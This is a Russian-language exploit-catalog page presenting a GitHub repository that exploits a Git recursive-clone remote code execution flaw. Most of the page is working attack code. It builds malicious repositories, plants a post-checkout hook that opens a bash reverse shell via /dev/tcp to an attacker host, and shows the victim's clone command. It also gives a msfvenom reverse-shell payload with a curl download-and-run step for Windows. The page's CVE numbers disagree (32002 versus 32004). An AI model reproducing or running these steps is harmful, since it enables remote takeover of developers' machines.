Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-32002 — Эксплойт для CVE-2024-32002 — уязвимости удалённого выполнения кода (RCE) в Git, которая использует рекурсивное клонирование подмодулей и симлинки для выполнения произвольных команд на целевых системах Windows и Linux. | Kitploit
Инструменты/GitHubGitHub/charlesgargasson/cve-2024-32002
Повышение привилегийЭксплуатацияЛатеральное перемещениеЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubcharlesgargasson/cve-2024-32002

CVE-2024-32002

Эксплойт для CVE-2024-32002 — уязвимости удалённого выполнения кода (RCE) в Git, которая использует рекурсивное клонирование подмодулей и симлинки для выполнения произвольных команд на целевых системах Windows и Linux.

Репозиторий
22 лет назадЕщё не проверено

###################### GIT RCE CVE-2024-32004 ######################


Описание


| CVE-2024-32004 | https://www.tarlogic.com/blog/cve-2024-32004-vulnerability-git/ |


Эксплойт


| Сначала вам нужно создать репозитории "calledrepo" и "commandrepo" на git. | Позже жертва выполнит клонирование calledrepo с помощью "git clone --recursive calledrepo.git", что перенаправит на commandrepo и выполнит хуковый скрипт. | Эта полезная нагрузка в виде обратной оболочки на bash работает на WINDOWS и LINUX. | | Я использую git CLI в Docker, чтобы не иметь проблем с моей системной конфигурацией git, но это необязательно.

.. code-block:: bash

Stat a debian docker instance

docker run --rm -it debian

Install git

apt update apt install -y git

| Настройка git

.. code-block:: bash

git config --global user.email "whatever" git config --global user.name "whatever" git config --global protocol.file.allow always git config --global core.symlinks true git config --global init.defaultBranch main

| Установка переменных

.. code-block:: bash

GIT_IP="10.129.19.99" GIT_USER="charles" GIT_PORT="3000" LHOST="10.10.14.113" LPORT="4444"

| Заполнение репозиториев

.. code-block:: bash

cd /tmp rm -rf calledrepo commandrepo

git clone "http://$GIT_IP:$GIT_PORT/$GIT_USER/commandrepo.git" cd commandrepo mkdir -p y/hooks cat <y/hooks/post-checkout #!/bin/bash /bin/bash -c "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1" EOF chmod +x y/hooks/post-checkout git add y/hooks/post-checkout git commit -m "post-checkout" git push cd ..

git clone "http://$GIT_IP:$GIT_PORT/$GIT_USER/calledrepo.git" cd calledrepo git submodule add --name x/y "http://$GIT_IP:$GIT_PORT/$GIT_USER/commandrepo.git" A/modules/x git commit -m "add-submodule" printf ".git" > dotgit.txt git hash-object -w --stdin < dotgit.txt > dot-git.hash printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info git update-index --index-info < index.info git commit -m "add-symlink" git push cd ..

Echo the command to run on victim

echo "git clone --recursive http://$GIT_IP:$GIT_PORT/$GIT_USER/calledrepo.git"

|


Windows


| После эксплуатации на Windows вы получите git bash, который имеет некоторые проблемы/ограничения: |

.. code-block:: bash

$ C:\windows\System32\whoami.exe /all bash: C:windowsSystem32whoami.exe: command not found

| Если вы хотите выйти из этого окружения, вы можете вызвать новую обратную оболочку |

.. code-block:: bash

Attacker side

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o payload.exe sudo cp payload.exe /var/www/html sudo nc -nvlp 443 -s 10.10.14.113

.. code-block:: bash

Windows side

cd ~/ curl http://10.10.14.113/payload.exe -O payload.exe ./payload.exe

|

| Не забывайте, что git bash может иметь приоритет над командами Windows. | Вы можете выполнить команду Windows, используя полный путь. |

.. code-block:: bash

C:\windows\System32\whoami.exe /all

|

Скачать инструмент